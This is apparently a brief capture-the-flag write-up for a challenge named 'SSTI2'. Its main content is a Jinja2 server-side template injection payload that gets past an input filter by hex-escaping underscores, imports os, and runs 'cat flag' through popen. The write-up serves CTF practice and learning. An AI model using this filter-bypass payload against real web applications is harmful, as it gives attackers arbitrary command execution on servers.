SSTI2

May 18, 2025

Here We are represented with the same website as the first challenge but here the input is filtered and also by searching the same repo payload we can find a payload that bypasses the filtering and we can read the flag by this command

1
{{request|attr('application')|attr('\x5f\x5fglobals\x5f\x5f')|attr('\x5f\x5fgetitem\x5f\x5f')('\x5f\x5fbuiltins\x5f\x5f')|attr('\x5f\x5fgetitem\x5f\x5f')('\x5f\x5fimport\x5f\x5f')('os')|attr('popen')('cat flag')|attr('read')()}}

SSTI2

Tags:

Categories: